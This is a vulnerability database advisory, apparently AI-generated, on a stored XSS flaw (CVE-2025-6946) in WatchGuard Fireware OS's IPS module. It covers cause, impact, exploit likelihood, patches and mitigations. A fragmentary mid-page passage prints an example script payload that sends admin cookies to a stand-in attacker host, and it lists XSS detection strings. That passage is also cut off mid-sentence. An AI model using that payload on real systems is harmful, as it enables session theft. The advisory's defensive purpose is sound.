
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-6946 is a Stored Cross-Site Scripting (XSS) vulnerability in WatchGuard Fireware OS, specifically within the IPS (Intrusion Prevention System) module. The flaw allows an authenticated administrator to inject malicious scripts that are persistently stored and later executed in the web management interface. It affects WatchGuard Firebox devices running Fireware OS versions 12.0 through 12.11.2 (and 12.5 through 12.5.12 in the 12.5.x branch). The vulnerability was published on December 4, 2025, with a patch advisory (WGSA-2025-00011) released by WatchGuard. It carries a CVSS v3.1 base score of 4.8 (Medium) (WatchGuard Advisory, Red Hat CVE).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The root cause is insufficient sanitization of user-supplied input within the IPS module of the Fireware OS web management interface, allowing malicious script content to be stored and rendered in the browser of any administrator who subsequently views the affected page. Exploitation requires an authenticated administrator session to a locally managed Firebox, meaning the attacker must already possess high-privilege credentials. The attack vector is network-based, requires user interaction (a victim administrator must view the injected content), and the scope is changed — meaning the injected script executes in the context of the victim's browser session rather than the server (WatchGuard Advisory, Red Hat CVE).
Successful exploitation could allow an attacker to steal administrator session cookies, manipulate the Firebox web management interface, expose sensitive firewall configuration details, or conduct targeted attacks against other administrative users. Because the injected script executes in the context of an authenticated administrator's browser session, an attacker could potentially hijack that session to perform unauthorized administrative actions on the Firebox. Availability is not directly impacted, but confidentiality and integrity of the management plane are at risk (WatchGuard Advisory, Red Hat CVE).
There is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation as of the time of disclosure. The EPSS score is approximately 0.043%, reflecting a low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is further constrained by the requirement for high-privilege (administrator-level) authenticated access to a locally managed Firebox, significantly limiting the attacker pool (WatchGuard Advisory, Red Hat CVE).
<script>document.location='http://attacker.com/steal?c='+document.cookie</script>) into an input field within the IPS module that is not properly sanitized before storage.<script>, javascript:, onerror=) present in IPS module configuration data or stored policy fields on the Firebox.WatchGuard has released patched versions of Fireware OS to address this vulnerability: upgrade to version 12.11.3 or later (for the 12.x branch) or 12.5.13 or later (for the 12.5.x branch). Organizations should apply the update as described in WatchGuard Security Advisory WGSA-2025-00011. As interim mitigations, restrict administrative access to the Firebox management interface to trusted personnel only, enforce multi-factor authentication (MFA) for all administrator accounts, and monitor and audit administrative sessions for anomalous activity (WatchGuard Advisory).
The vulnerability received limited public attention given its medium severity and high privilege requirement. It was noted in standard vulnerability tracking feeds and databases including Vulners, CVEFeed, and CIRCL. A brief mention appeared on Mastodon/infosec.exchange, but no significant researcher commentary or media coverage was identified beyond routine CVE publication notices (Red Hat CVE).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."